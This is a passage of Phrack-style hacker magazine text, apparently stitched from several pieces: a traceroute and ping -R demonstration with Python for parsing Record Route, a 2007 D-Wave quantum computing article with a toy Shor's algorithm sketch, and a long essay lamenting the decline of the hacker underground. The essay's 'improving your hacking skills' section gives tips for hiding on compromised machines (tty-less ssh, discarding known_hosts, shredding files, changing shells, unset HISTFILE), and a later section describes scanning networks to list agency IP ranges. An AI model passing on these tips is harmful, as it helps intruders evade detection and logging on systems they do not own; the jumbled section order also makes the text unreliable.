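    opt_type, length, pointer = struct.unpack("!BBB", option[:3])
    if opt_type != IPOPT_RR:
        raise ValueError("not a Record Route option")
    recorded = (pointer - 4) // 4
    return [socket.inet_ntoa(option[3 + 4 * i:7 + 4 * i])
            for i in range(recorded)]


# Hypothetical walk through two hops.
option = build_empty_rr()
for hop in ("68.87.129.138", "4.68.121.50"):
    option = record_hop(option, hop)
print(parse_rr(option))
```

Nine slots is a hard limit of the IP header, so on a long path only the
first nine recording hops are visible, and routers are free to ignore
the option altogether.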


First, do a traceroute to find out where your ISP connects to the rest 
of the net; 


[snip]
 5  68.87.129.137 (68.87.129.137)  28.902 ms  14.221 ms  13.883 ms
 6  COMCAST-IP.car1.Washington1.Level3.net (63.210.62.58)  19.833 ms * 21.768 ms
 7  te-7-2.car1.Washington1.Level3.net (63.210.62.49)  19.781 ms  19.092 ms  17.356 ms


Hop #5 is on Comcast’s network. Hop #6 is their transit provider. We
want to send a ping -R to the transit provider (63.210.62.58):


[root@phrack root]# ping -R 63.210.62.58
PING 63.210.62.58 (63.210.62.58) from XXX.XXX.XXX.XXX : 56(124) bytes of data.
64 bytes from 63.210.62.58: icmp_seq=0 ttl=243 time=31.235 msec
NOP
RR:     [snip]
        68.87.129.138
        68.86.90.90
        4.68.121.50
        4.68.127.153
        12.123.8.117


117.8.123.12.in-addr.arpa. domain name pointer
sar1-a360s3.wswdc.ip.att.net.


An AT&T hop on Level3’s network? Wow, we are still safely under the 
watchful eye of our magnificent benevolent intelligence agencies. I 
feel safer already. 


--[ 5. D-Wave demonstrates a quantum computer 
by aris 


On February 13th, 2007, D-Wave Systems made a public demonstration
of their brand-new quantum computer, which could be a revolution in
computing and in cryptography in general. The demonstration took
place in Mountain View, Silicon Valley, though the quantum computer
itself stayed in Vancouver, remotely connected over the Internet.


The quantum computer is a hybrid construction of a classical computer
and a quantum "accelerator" chip: the classical computer performs the
ordinary operations, isolates the complicated stuff, prepares it to be
processed by the quantum chip, then gives back the results. The whole
mechanism is meant to be usable over networks (with RPC) so that it is
accessible to companies that want a quantum computer but can’t manage
to host it at their main office (the hardware has special
requirements). [1]


The quantum chip is a 16-Qbit engine, using superconducting
electronics.


Quantum computers have been attempted before, but none of them is
known to have had more than 3 or 4 Qbits. D-Wave also claims to be able
to scale that number of Qbits up to 1024 in 2008! That made a lot
of people in the scientific community skeptical about D-Wave’s claims.
The US National Aeronautics and Space Administration (commonly known as
NASA) confirmed to the press that they built the special chip for
D-Wave according to D-Wave’s specifications. [2]


Now, how does the chip work? D-Wave hasn’t released many details
about the internals of their chip. They have chosen superconductors
because they make it easier to exploit quantum mechanics. When some
materials are very cold (approaching 0 K), they become
superconducting. They then have special characteristics, including the
fact that their electrons show a different quantum behaviour.


Internally, the chip contains 16 Qbits arranged in a 4x4 grid,
each Qbit being coupled with its four immediate neighbors and some of
its diagonal neighbors. [3]

The coupling of Qbits is what gives them their power: a Qbit is
believed to be in two states at the same time. When coupling two Qbits,
the combination of their states contains four states, and so on.
The more Qbits are coupled together, the more possible states
they have, and when running an algorithm on them, you manipulate all
of their states at once, giving a very important performance boost. By
its nature, it may even help to solve NP-complete problems and other
problems for which no polynomial-time classical algorithm is known (we
think of large sudoku grids, multivariate polynomial systems, factoring
large integers ...).
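The "two states, then four states, and so on" progression is simply
2^n: n fully coupled Qbits are described by 2^n basis states. The tiny
Python sketch below just does that arithmetic and builds the uniform
superposition as a plain list of amplitudes. It is a classical
illustration of the counting argument only, it says nothing about how
the D-Wave chip works internally, and the function names are invented
for the example.

```python
def basis_states(n_qbits):
    """Number of basis states of n fully coupled Qbits (2 to the power n)."""
    return 2 ** n_qbits


def uniform_superposition(n_qbits):
    """Amplitudes of the state in which every basis state is equally likely."""
    dim = basis_states(n_qbits)
    amplitude = dim ** -0.5     # squared amplitudes must sum to 1
    return [amplitude] * dim


for n in (1, 2, 4, 16):
    print(n, "Qbits ->", basis_states(n), "basis states")
```

Simulating such a register classically means storing one amplitude per
basis state, so the memory needed doubles with every Qbit added; this
is the intuition behind the performance boost described above.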


Not coupling all of the Qbits makes the chip easier to build and
to scale, but their 16-Qbit computer is not equivalent to the
theoretical 16-Qbit computers that academics and governments have been
trying to build for years.


The impact of this news on the world is currently minimal. Their chips
currently work slower than a low-range personal computer and cost
thousands of dollars, but maybe in some years they will become a real
solution for solving NP problems.


The hard problem that most people involved in security know is obviously
the factoring of large numbers. We even have a proof that there exists
a *polynomial-time* quantum algorithm to factorize the product of two
large primes: it is named Shor’s algorithm. It means that once we have
the hardware to run it, factorizing a 1024-bit RSA key will only take
a few times longer than factorizing a 512-bit key.
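Shor’s algorithm only needs the quantum hardware for one step: finding
the order r of a number a modulo N, that is, the smallest r > 0 with
a^r = 1 (mod N). Turning r into a factor of N is ordinary number
theory. The Python sketch below shows that classical part and replaces
the quantum step with a brute-force loop, which is exponentially slow
and only usable on toy numbers. The function names are made up for the
illustration.

```python
from math import gcd


def find_order(a, n):
    """Smallest r > 0 with a**r % n == 1 (brute force stand-in for the
    quantum order-finding step)."""
    if gcd(a, n) != 1:
        raise ValueError("a and n must be coprime")
    r, x = 1, a % n
    while x != 1:
        x = (x * a) % n
        r += 1
    return r


def factor_from_order(n, a):
    """Try to split n with base a. Returns (p, q) or None if a is unlucky."""
    if not 1 < a < n:
        raise ValueError("pick a base with 1 < a < n")
    g = gcd(a, n)
    if g != 1:
        return (g, n // g)      # lucky guess: a already shares a factor
    r = find_order(a, n)
    if r % 2 == 1:
        return None             # odd order: try another base
    half = pow(a, r // 2, n)
    if half == n - 1:
        return None             # a^(r/2) = -1 (mod n): try another base
    p = gcd(half - 1, n)        # half^2 = 1 and half != +-1, so p splits n
    return (p, n // p)


print(factor_from_order(15, 7))
```

With a = 7 and N = 15 the order is 4, 7^2 mod 15 = 4, and gcd(4 - 1, 15)
gives the factor 3. An unlucky base such as a = 14 returns None and one
simply picks another.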


Such an algorithm would completely destroy the security of public-key
cryptography as we know it now.

Unfortunately, we have no information on which known quantum algorithms
run on the D-Wave computer, and D-Wave made no statement about running
Shor’s algorithm on their beast. Also, no claim has been made that would
let us think the chip could break RSA. And for sure, NSA experts have
probably already studied the situation (in case they don’t already own
their own quantum computer).


References: 


[1] http://www.dwavesys.com/index.php?page=quantum-computing
[2] http://www.itworld.com/Tech/3494/070309nasaquantum/index.html
[3] http://arstechnica.com/articles/paedia/hardware/quantum.ars


6. Conclusion


--[ 1. Introduction


"It’s been a long long time,
I kept this message for you, Underground
But it seems I was never on time
Still I wanna get through to you, Underground..."


I am sure most of you know and love this song (Stir it Up). After all, 
who doesn’t like a Bob Marley song? The lyrics of this song fit very well 
with my feelings: I was never on time but now I’m ready to deliver you
the message. 


So what is this article about? I could write another technical article 
about an eleet technique to bypass a buffer overflow protection, how to 
inject my magical module in the kernel, how to reverse like an eleet or 
even how to make a shellcode for a not-so-famous OS. But I won’t. There 
are some other people who can do it much better than I could. 


But that isn’t my reason for not writing a technical article. The purpose of
this article is to launch an SOS. An SOS to the scene, to everyone, to all 
the hackers in the world. To make all the next releases of Phrack better 
than ever before. And for this I don’t need a technical article. I need 
what I would call Spirit. 


Do you know what I mean by the word spirit? 


--[ 2. The security paradox. 


There is something strange, really strange. I always compare the
security world with the drug world. Take the drug world: on the one side
you have all the "bad" guys: cartels, dealers, retailers, users... On
the other side, you have all the "good" guys: cops, DEA, pharmaceutical
groups creating medicines against drugs, the president of the USA asking
for more budget to counter drugs... The main speech of all these good
guys is: "we have to eradicate drugs!". Well, why not. Most of us agree.


But if there were no more drugs in the world, I guess that a big part
of the world economy would fall. Small dealers wouldn’t have the money to
buy food, pharmaceutical groups would lose a big part of their business,
DEA and similar agencies wouldn’t have any reason to exist. All the
drug centers could be closed, banks would lose the money coming from the
drug market. If you take all those things into consideration, do
you think that governments would want to eradicate drugs? Asking the
question is probably answering it.


Now let’s move on to the security world.


On the one side you have a lot of companies, conferences, 
open source security developers, computer crime units... On the 
other side you have hackers, script kiddies, phreakers... Should
I explain this again or can I directly ask the question? Do you really 
think that security companies want to eradicate hackers? 


To show you how these two worlds are similar, let’s look at another
example. Sometimes, you hear that the cops have arrested a dealer, maybe
a big dealer. Or even an entire cartel. "Yeah, look! We have arrested a
big dealer! We are going to eradicate all the drugs in the world!!!". And
sometimes, you see news like "CCU arrests Mafiaboy, one of the best
hackers in the world". Computer crime units and the DEA need publicity:
they arrest someone and say that this guy is a terrorist. That’s the best
way to ask for more money. But they will rarely arrest one of the best
hackers in the world. Two reasons. First, they don’t intend to (and if
they did, it would probably be to hire him rather than arrest him).
Secondly, most of the Computer Crime Units don’t have the knowledge
required.


This is really a shame, nobody is honest. Our governments claim that
they want to eradicate hackers and drugs, but they know that if there were
no more hackers or drugs, a big part of the world economy could fall. It’s
exactly the same thing again with wars. All our presidents claim that we
need peace in the world, and again most of us agree. But if there were no
more wars, companies like Lockheed Martin, Raytheon, Halliburton, EADS,
SAIC... would lose a huge part of their markets, and banks wouldn’t have
the money generated by the wars.


The paradox lies in the perpetual assumption that the threat is
generated by abuses, where in fact it might come from improper
technological design or money-driven technological improvement, where the
last element overshadows the first. And when someone who is dedicated
enough digs into it, we have a snowball effect, so that every fish in the
pond at one time or another becomes a part of it.


And as you can see, this paradox is not exclusive to the security 
industry/underground or even the computer world, it could be considered 
as the gold idol paradox but we do not want to get there. 


In conclusion, the security world needs a reason to justify its
business. This reason is the presence of hackers or of a threat (whatever
hacker means), the presence of a hacker scene and, in more general terms,
the presence of the Underground.


We don’t need them to exist; we exist because we like learning,
learning what we are not supposed to learn. But they give us another good
reason to exist. So if we are "forced" to exist, we should exist in
the right way. We should be well organized, with a spirit that reflects
our philosophy. Unfortunately, this spirit which used to characterize us
is long gone...


--[ 3. Past and Present Underground scene


The "scene", this is a beautiful word. I am currently in a country
very far away from all of your countries, but it is still an
industrialized country. After spending some months in this country, I
found some old-school hackers. When I asked them how the scene was in
their country, they always answered the same thing: "like everywhere,
dying". It’s a shame, really a shame. The security world is getting
larger and larger and the Underground scene is dying.


I am not an old school hacker. I don’t have the pretension to claim
it. I would rather say that I have some old-school tricks or maybe that my
mind is old-school oriented, but that’s all. I started to enjoy the
hacking life more or less 10 years ago. And the scene was already dying.


When I started hacking, like a lot of people, I read all the past
issues of Phrack. And I really enjoyed the experience. Nowadays,
I’m pretty sure that new hackers don’t read old Phrack articles anymore.
Because they are lazy, because they can find information elsewhere,
because they think old Phracks are outdated... But reading old Phracks
is not only about acquiring knowledge, it’s also about acquiring the
hacking spirit.


----[ 3.1 A lack of culture and respect for ancient hackers 


How many new hackers know hacker history? A simple example is
Securityfocus. I’m sure a lot of you consult its vulnerability
database or some of its mailing lists. Maybe some of you know Kevin
Poulsen, who worked for Securityfocus for some years and now works for
Wired. But how many of you know his history? How many know that at the
beginning of the 80’s he was arrested for the first time for breaking
into ARPANET? And that he was arrested a lot more times after that as
well? Probably not a lot (what’s ARPANET after all...).


It’s exactly the same kind of story with the most famous hacker in
the world: Kevin Mitnick. This guy really was amazing and I have
total respect for what he did. I don’t want to argue about his present
activity, it’s his choice and we have to respect it. But nowadays,
when new hackers talk about Kevin Mitnick, one of the first things I
hear is: "Kevin is lame. Look, we have defaced his website, we are much
better than him". This is completely stupid. They have probably found a
stupid web bug to deface his website and they probably found the way to
exploit the vulnerability in a book like Hacking Web Exposed. And after
reading this book and defacing Kevin’s website, they claim that Kevin
is lame and that they are the best hackers in the world... Where are we
going? If these hackers could do a third of what Kevin did, they would
be considered heroes in the Underground community.


Another part of the hacking culture is what some people call "The
Great Hackers War" or simply "Hackers War". It happened 15 years ago
between probably the two most famous (best?) hacker groups that have
ever existed: The Legion of Doom and Masters of Deception. This chapter
of hacking history is amazing in itself (google it), but what I
wonder is how many hackers from the new generation know that famous
hackers like Erik Bloodaxe or The Mentor were part of these groups.
Probably not a lot. These groups were mainly composed of skilled and
talented hackers/phreakers. And they were our predecessors. You can still
find their profiles in past issues of Phrack. It’s still a nice read.


Let’s go for another example. Who knows Craig Neidorf? Nobody? Maybe
Knight Lightning sounds more familiar to you... He was the first
editor-in-chief of Phrack with Taran King, who called him his
"right hand man". With Taran King and him, we had a lot of good,
spirit-oriented articles. So spirit-oriented that one article almost sent
him to jail for disclosing a confidential document from Bell South.
Fortunately, he didn’t go to jail, thanks to the Electronic Frontier
Foundation, which supported him. Craig wrote for the first time in Phrack
issue 1 and for the last time in Phrack issue 40. He is simply the best
contributor that Phrack has ever had, with more than 100 contributions.
Not interesting? This is part of the hacking culture.


More recently, in the 90’s, an excellent "magazine" (it was more a
collection of articles) called F.U.C.K. (Fucked Up College Kids) was
made by a hacker named Jericho... Maybe some new hackers know Jericho for
his work on Attrition.org (that’s not certain...), but have you ever taken
the time to check the Attrition website and look at all the good work that
Jericho and friends do? Did you know that Jericho wrote excellent Phrack
World News under the name Disorder 10 years ago (and trust me, his news
was great)? Stop thinking that Attrition.org is only an old dead mirror of
web site defacements, it’s much more and it’s spirit oriented.


Go ask Stephen Hawking if knowing the history of science is not
important for understanding the scientific way/spirit... Do you think that
Stephen doesn’t know the story of Aristotle, Galileo, Newton or Einstein?


To help wannabe hackers, I suggest that they read "The Complete
History of Hacking" or "A History of Computer Hacking", which are very
interesting for a first dive into hacking history and can easily be
found with your favorite search engine.


Another good reading is the interview of Erik Bloodaxe in 1994 
(http://www.eff.org/Net_culture/Hackers/bloodaxe-goggans_94.interview) 
where Erik said something really interesting about Phrack:


"I, being so ridiculously nostalgic and sentimental, didn’t want to see
it (phrack) just stop, even though a lot of people always complain about
the content and say, "Oh, Phrack is lame and this issue didn’t have enough
info, or Phrack was great this month, but it really sucked last month."
You know, that type of thing. Even though some people didn’t always
agree with it and some people had different viewpoints on it, I really
thought someone needed to continue it and so I kind of volunteered for
it."


It’s still true... 


----[ 3.2 A brief history of Phrack 


Let’s go for a short hacking history course and let’s take a look at 
old Phracks where people talked about the scene and what hacking is. 


Phrack 41, article 1:


"The type of public service that I think hackers provide is not showing
security holes to whomever has denied their existence, but to merely
embarrass the hell out of those so-called computer security experts
and other purveyors of snake oil."


This is true, completely true. This is closely related to what I said 
before. If there are no hackers, there are no security experts. They 
need us. And we need them. (We are family) 


Phrack 48, article 2: 


At the end of this article, there is the last editorial of Erik 
Bloodaxe. This editorial is excellent, everyone should read it. I will 
just reproduce some parts here:


"... The hacking subculture has become a mockery of its past self.
People might argue that the community has "evolved" or "grown" somehow,
but that is utter crap. The community has degenerated. It has become a
media-fueled farce. The act of intellectual discovery that hacking once
represented has now been replaced by one of greed, self-aggrandization
and misplaced post-adolescent angst... If I were to judge the health of
the community by the turnout of this conference, my prognosis would be
"terminally ill."..."


And this was in 1996. If we asked Erik Bloodaxe now what he thinks
about the current scene, I’m pretty sure he would say something
like: "irretrievable" or "the hacking scene has reached a point of no
return".


"...There were hundreds of different types of systems, hundreds
of different networks, and everyone was starting from ground zero.
There were no public means of access; there were no books in stores or
library shelves espousing arcane command syntaxes; there were no classes
available to the layperson. ..."


Have you ever heard of a "hackademy"? Nowadays, if you want to be a 
hacker it’s really easy. Just go to a hacker school and they will teach 
you some of the most eleet tricks in the world. That’s the new hacker way.


"Hacking is not about crime. You don’t need to be a criminal to be
a hacker. Hanging out with hackers doesn’t make you a hacker any more
than hanging out in a hospital makes you a doctor. Wearing the t-shirt
doesn’t increase your intelligence or social standing. Being cool doesn’t
mean treating everyone like shit, or pretending that you know more than
everyone around you."


So what is hacking? My point of view is that hacking is a philosophy, 
a philosophy of life that you can apply not only to computers but to 
a lot of things. Hacking is learning, learning computers, networks, 
cryptology, telephone systems, spying system and agencies, radio, what 
our governments hide... Actually all non-conventional subjects or what 
could also be called a third eye view of the context. 


"There are a bunch of us who have reached the conclusion that the "scene" 
is not worth supporting; that the cons are not worth attending; that the 
new influx of would-be hackers is not worth mentoring. Maybe a lot of us 
have finally grown up." 


Here’s my answer to Erik 10 years later: "No Erik, you hadn’t finally
grown up, you were right." Erik already sent an SOS 10 years ago and 
nobody heard it. 


Phrack 50, article 1:


"It seems, in recent months, the mass media has finally caught onto
what we have known all along, computer security _IS_ in fact important.
Barely a week goes by that a new vulnerability of some sort doesn’t pop up
on CNN. But the one thing people still don’t seem to fathom is that _WE_
are the ones that care about security the most... We aren’t the ones that
the corporations and governments should worry about... We are not
the enemy."


No, we are not the enemy. But a lot of people claim that we are and 
some people even sell books with titles like "Know your enemy". It’s
probably one of the best ways to be hated by a lot of hackers. Don’t be 
surprised if there are some groups like PHC appearing after that. 


Phrack 55, article 1: 


Here I will show you the arrogance of the not-so-distant past editor,
answering some comments:


"...Yeah, yeah, Phrack is still active you may say. Well let me tell
you something. Phrack is not what it used to be. The people who make
Phrack are not Knight Lightning and Taran King, from those old BBS
days. They are people like you and me, not very different, that took
on themselves a job that it is obvious that is too big for them. Too
big? hell, HUGE. Phrack is not what it used to be anymore. Just try
reading, let’s say, Phrack 24, and Phrack 54..."


And the editor replied (maybe Route):


"bjx of "PURSUIT" trying to justify his ‘old-school’ ezine. bjx wrote
a riveting piece on "Installing Slackware" article. Fear and respect
the lower case "i"."


This is a perfect example of how the Underground scene has grown up in
the last few years. We can read the editor’s answer as "I’m writing
some eleet articles and you are not, so I don’t have to take your point
of view into consideration". But it was a really pertinent remark.


Phrack 56, article 1: 


Here is another excellent example to show you the arrogance of the
Underground scene. Again, it’s an answer to a comment from someone:


"...IMHO it hasn’t improved. Sure, some technical aspects of the
magazine have improved, but it’s mostly a dry technical journal these
days. The personality that used to characterize Phrack is pretty much
non-existant, and the editorial style has shifted towards one of ‘I know
more about buffer overflows than you’ arrogance. Take a look at the Phrack
Loopback responses during the first 10 years to the recent ones. A much
higher percentage of responses are along the lines of ‘you’re an idiot,
we at Phrack Staff are much smarter than you.’..."


And the reply:


"- Trepidity <delirium4u@theoffspring.net> apparently still bitter at
not being chosen as Mrs. Phrack 2000."


IMHO, Trepidity’s remark was probably the best remark for a long long 
time. 


Let’s stop this little history course. I have shown you that I’m
not alone in my thinking and that there is something wrong with the
current dysfunctional scene. Some people already thought this 10 years ago
and I know that a lot of people are currently thinking exactly the same
thing. The scene is dying and its spirit is flying away.


I’m not Erik Bloodaxe, I’m not Voyager or even Taran King ... I’m
just me. But I would like to do something like 15 years ago, when the
word hacking was still used in the noble sense. When the spirit was still
there. We all need to react together or the beast will eat what’s left
of the spirit.


----[ 3.3 The current zombie scene


"A dead scene whose body has been re-animated but whose spirit
is lacking".


I’m not really aware of every ‘group’ in the world. Some people are
much more connected than me. And to be honest, I knew the scene better 5
years ago than I do now. But I will try to give you a snapshot of what
the current scene is. Forgive me in advance for the groups that I will
forget, it’s really difficult to have an accurate snapshot. The best way
to get a snapshot of the current scene is probably to use an algorithm
like HITS, which makes it possible to detect a web community from its
link structure. But unfortunately I don’t have time to implement it.
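For the curious, the core of HITS is short. Every page gets two scores:
an authority score (it is linked to by good hubs) and a hub score (it
links to good authorities). The two are recomputed from each other and
normalized until they settle. The Python sketch below is a minimal
version under simple assumptions: the link graph is already in memory
as a dict, the number of iterations is fixed, and the page names in the
example are invented. Crawling the sites and building the graph, which
is the real work, is left out.

```python
def _normalize(scores):
    """Scale the scores so that the sum of their squares is 1."""
    norm = sum(v * v for v in scores.values()) ** 0.5
    if norm == 0:
        return dict(scores)
    return {page: v / norm for page, v in scores.items()}


def hits(links, iterations=50):
    """links maps a page to the pages it links to.
    Returns two dicts: (hub scores, authority scores)."""
    pages = set(links)
    for targets in links.values():
        pages.update(targets)
    hubs = dict.fromkeys(pages, 1.0)
    auths = dict.fromkeys(pages, 1.0)
    for _ in range(iterations):
        # Authority: sum of the hub scores of the pages linking to it.
        auths = dict.fromkeys(pages, 0.0)
        for src, targets in links.items():
            for dst in targets:
                auths[dst] += hubs[src]
        auths = _normalize(auths)
        # Hub: sum of the authority scores of the pages it links to.
        hubs = {p: sum(auths[d] for d in links.get(p, ())) for p in pages}
        hubs = _normalize(hubs)
    return hubs, auths


# Hypothetical link graph: three sites pointing at two others.
graph = {
    "site-a": ["site-c", "site-d"],
    "site-b": ["site-c", "site-d"],
    "site-e": ["site-c"],
}
hub_scores, authority_scores = hits(graph)
print(max(authority_scores, key=authority_scores.get))
```

Pages that end up with high scores together form the kind of web
community mentioned above; in this toy graph site-c comes out as the
top authority because all three hubs point to it.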


All of these people make up the current scene. It’s a big mixture
of white/gray/black hats, where some people are white hat in the day
and black hat at night (and vice-versa). Sometimes there is communication
between them, sometimes not. I also have to say that it’s generally the
people from layer 1 groups who give talks at security conferences around
the world...


It’s really a shame that PHC is probably the best ambassador of the 
hacking spirit. Their initiative was great and really interesting. 
Moreover they are quite funny. But IMHO, they are probably a little too 
arrogant to be considered an old spirit group.


Actually, the bad thing is that all these people are more or less
separate and everyone is fighting everyone else. You can even find some
hackers hacking other hackers! Where is the scene going? Even if you are
technically very good, do you have to tell everyone that you are
the best and call others lamerz? The new hacker generation
will never understand the hacking spirit with this mentality.


Moreover, the majority of hackers are completely uninterested in
the alternative subjects addressed, for example, in 2600 magazine or
on the Cryptome website. And this is really a shame, because these two
media publish some really good information. Most hackers are only
interested in pure hacking techniques like backdooring, network
exploitation, client vulnerabilities... But for me hacking is closely
related to other subjects like those addressed on the Cryptome website.
For example, the majority of hackers don’t know what SIPRnet is. There is
only one reference in Phrack, but there are several articles about SIPRnet
in 2600 magazine or on the Cryptome website. When I want to discuss
these interesting subjects, it’s really difficult to find someone in the
scene. And to be honest, the only people that I can find are people away
from the scene. The majority of hackers composing the groups I mentioned
above are not interested in these subjects (as far as I know). Old school
hackers in the 80’s or 90’s were more interested in alternative subjects
than the new generation.


In conclusion, firstly we have to get back the old school hacking 
spirit and afterwards explain to the new generation of hackers what it is. 


It’s the only way to survive. The scene is dying but I won’t say 
that we can’t do anything. We can do something. We must do something. 
It’s our responsibility. 


--[ 4 Are security experts better than hackers? 


STOP!!! I do not want to say that security experts are better than
hackers. I don’t think they are, but to be honest it’s not really
important. It’s nonsense to ask who is better. The best guy, whatever
techniques he uses, is always the most ingenious. But there are two
points that I would like to develop.


----[ 4.1 The beautiful world of corporate security


I met a really old school hacker some months ago. He told me something
very pertinent and I think he was right. He told me that the technology
has really changed these last years but that the old school tricks still
work. Simply because the people working for security companies don’t
really care about security. They care more about finding a new eleet
technique to attack or defend a system and presenting it at a security
conference than about using it in practice.


So Underground, we have a problem. A major problem. 15 years ago,
there were a lot of people working for the security industry. At that
time, there were also a lot of people working in what I will call the
Underground scene. No-one can estimate the percentage in each camp, but
I would say it was something like 60% working in security and 40% working
in the Underground scene. It was still a good distribution. Nowadays, I’m
not sure it’s still true. A better estimate would be 80/20 in favour
of security, or maybe even worse... More and more people are working
for the security world rather than for the Underground scene. Look
at all these "eleet" security companies like ISS, Core Security, Immunity,
IDefense, eEye, @stake, NGSSoftware, Checkpoint (!), Counterpane, Sabre
Security, Net-Square, Determina, SourceFire... I will stop here, otherwise
Google will make some publicity for these companies. All these security
companies have hired and still hire some hackers, even if they will say
that they don’t. Sometimes, they don’t even know they hired a hacker. How
many past Phrack writers work for these companies? My guess is a lot,
really a lot. After all, you can’t stop a hacker if you have never been
one...


You’ll tell me: "that’s normal, everyone has to eat". Yeah, that’s
true. Everyone has to eat. I’m not talking about that. What I don’t like
(even if we do need these good and bad guys) is all the stuff around the
security world: conferences, (false) alerts, magazines, mailing lists,
pseudo security companies, pseudo security websites, pseudo security
books...


Can you tell me why there is so much security related stuff and not 
so much Underground related stuff? 


----[ 4.2 The in-depth knowledge of security conferences


If you have a look at all the topics addressed in a security
conference, it’s amazing. Take the most famous conferences: *Blackhat,
*SecWest or even Defcon (I mention only marketing conferences, there are
other good conferences that are less corporate/business oriented like
ccc, PH neutral, HOPE or WTH). Now look at the talks given by the
speakers, they’re really good. When I went to a security conference 5
years ago it was so funny, I was saying to my friends: "these guys are
5 years late". It was true then but I think it’s not true anymore. They
are probably still late, but not as late as they were. But the most
relevant point for me is that recently there have been a lot of very
interesting subjects. OK not everything was interesting - there were
some shit subjects too. What I would consider as interesting subjects
are those related to new technologies (VOIP, WEB 2.0, RFID, BlackBerry,
GPS...) or original topics like hardware hacking, BlackOps, agency
relationships, SE story, bioinfo attack, nanotech, PsyOp... What the
Fuck ?!#@?! 10 years ago, all the original topics were released in an
Underground magazine like Phrack or 2600. Not in a security conference
where you have to pay more than $1000.


This is not my idea of what hacking should be. Do you really need
publicity like this to feel good? This is not hacking. I’m not talking
here about the substance but the form. When I’m coding something at home
all night and in the morning it works, it’s really exciting. And I don’t
have to say to everyone "look at what I did!". Especially not in public
where people have to pay more than $1000 to hear you.


Another incredible thing about these security conferences is what I
would call the "conference circuit". Nowadays, if you are a security
expert, the trend is to give the same talk at different security
conferences around the world. More than 50% of all security experts are
doing this. They go to America for BlackHat, Defcon and CanSecWest, then
they move on to Europe and they finish in Asia or Australia. They can even
do BlackHat America, BlackHat Europe and BlackHat Asia! Like Roger
Federer or Tiger Woods, they try to do the Grand Slam! So you can find
a talk given in 2007 which is more or less the same as one given in
2005. Thus it seems we now have a new profession in our wonderful
security world: "conference runner"!


The last funny thing is the number of talks that I will include in
the category "How to hack the system XXX". For example at the last
Blackhat USA there was a talk on how to hack embedded devices such as
printers and copiers. Despite the fact that it’s interesting
(collecting printed documents), what I find funny is the fact that you
just have to hack a non conventional device to be at Blackhat or Defcon.
So, I will give some good advice to hackers who want to become famous:
try to hack the coffee machine used by the FBI or the embedded device
used by the lift of the Pentagon and everyone will see you as a hero
or a terrorist (that’s context based).


--[ 5. Phrack and the axis of counter-attack


Now that I have given you an overview of the security world, let’s
try to see how we can change it. There are two possibilities here. The
first one is this: I say to you "OK now that you really understand the
problem, it’s definitely time to change our mentality. This is the new
mind set that we have to adopt". It’s a little bit pretentious to say
this though. Nobody can solve the problem alone and claim to bring the
right solution. So I guess that the first possibility won’t work. People
will agree but nobody will do anything.


The second possibility is to start with Phrack. All the people who
make up The Circle of Lost Hackers agree that Phrack should come back to
its past style when the spirit was present. We really agree with the quote
above which said that Phrack is mainly a dry technical journal. That’s
why we would like to give you some ideas that can bring back to Phrack its
bygone aura. Phrack doesn’t belong to a group of people, Phrack belongs to
everyone, everyone in the Underground scene who wants to bring something
to the Underground. After all, Phrack is a magazine made by the community
for the community.


We would like to invite everyone to give their point of view about the 
current scene and the orientation that Phrack should take in the future. 
We could compile a future article with all your ideas. 


----[ 5.1. Old idea, good idea 


If you take a look at the old Phrack, there are some recurring
articles:


* Phrack LoopBack
* Line noise
* Phrack World News
* Phrack Prophiles
* International scenes


Here’s something funny about Phrack World News, if you take a look
at Phrack 36 it was not called "Phrack World News" but instead it was
"Elite World News"...


So, all these articles were and are interesting. But among these
articles, we would like to resuscitate the last one: "International
scenes". A first attempt is made in this issue, but we would like people
to send us a short description of their scene. It could be very
interesting to have some descriptions of scenes that are not common,
for example the China scene, the Brazilian scene, the Russian scene,
the African scene, the Middle East scene... But of course we are also
interested in the more classic scenes like Americas, GB, France, Germany,
... Everything is welcome. Hackers all over the world are not only
hackers in Europe-Americas, we’re everywhere. And when we talk about the
Underground scene, it should include all local scenes.


----[ 5.2. Improving your hacking skills 


Here we would like to start a new kind of article. An article whose
purpose is to give the new generation of hackers some different little
tricks to hack "like an eleet". This article will be present in every
new issue (at least until it’s dead ... we hope not soon). The idea is
to ask everyone to send us their tricks when they hack something
(it could be a computer or not). The tricks should be explained in no
more than 30 lines, and it could even be one line. It could be an eleet
trick or something really simple but useful. Example:


An almost invisible ssh connection


In the worst case, if you have to ssh to a box, do it every time
with no tty allocation:


ssh -T user@host


If you connect to a host this way, a command like "w" will not
show your connection. Better, add ’bash -i’ at the end of the command to
simulate a shell:


ssh -T user@host /bin/bash -i


Another trick with ssh is to use the -o option, which allows you to
specify a particular known_hosts file (by default it’s
~/.ssh/known_hosts). The trick is to use -o with /dev/null:


ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i


With this trick the IP of the box you connect to won’t be logged in
known_hosts.


Using an alias is a good idea.


Erasing a file


If you have to erase a file on an owned computer, try
to use a tool like shred, which is available on most Linux systems.


shred -n 31337 -z -u file_to_delete


-n 31337 : overwrite the content of the file 31337 times
-z : add a final overwrite with zeros to hide shredding
-u : truncate and remove file after overwriting


A better idea is to make a small partition in RAM with tmpfs or
ramdisk and store all your files inside.


Again, using an alias is a good idea.


The quick way to copy a file 


If you have to copy a file on a remote host, don’t bore yourself with
an FTP connection or similar. Do a simple copy and paste in your Xconsole.
If the file is a binary, uuencode the file before transferring it.


A more eleet way is to use the program ’screen’ which allows copying a 
file from one screen to another: 


To start/stop : C-a H or C-a : log 


And when it’s logging, just do a cat on the file you want to transfer. 


Changing your shell 


The first thing you should do when you are on an owned computer is to 
change the shell. Generally, systems are configured to keep a history for 
only one shell (say bash), if you change the shell (say ksh), you won’t be 
logged. 


This will prevent you being logged in case you forget to clean 
the logs. Also, don’t forget ’unset HISTFILE’ which is often useful. 


Some of these tricks are really stupid and for sure all old school
hackers know them (or don’t use them because they have more eleet tricks).
But they are still useful in many cases and it should be interesting to
compare everyone’s tricks.


----[ 5.3. The Underground yellow pages 


Another interesting idea is to maintain a list of all the interesting
IP ranges in the world. This article will be called "Meaningful IP
ranges". We have already started to scan all the class A and B networks.
What is really interesting is all the IP addresses of agencies which are
supposed to spy on us. Have a look at this site:


http://www.milnet.com/iagency.htm


However we don’t have to limit our list to agencies; it should cover
everything which is supposed to hold power in the world.
It includes:


* All agencies of a country (China, Russia, UK, France, Israel...) 


* All companies in a domain, for example all companies related to private 
secret service or competitive intelligence or financial clearing or 
private army (dyncorp, CACI, MPRI, Vinnel, Wackenhut, ...) 


* Companies close to government (SAIC, Dassault, QinetiQ, Halliburton, 
Bechtel...) 


* Spying business companies (AT&T, Verizon, VeriSign, AmDocs, BellSouth, 
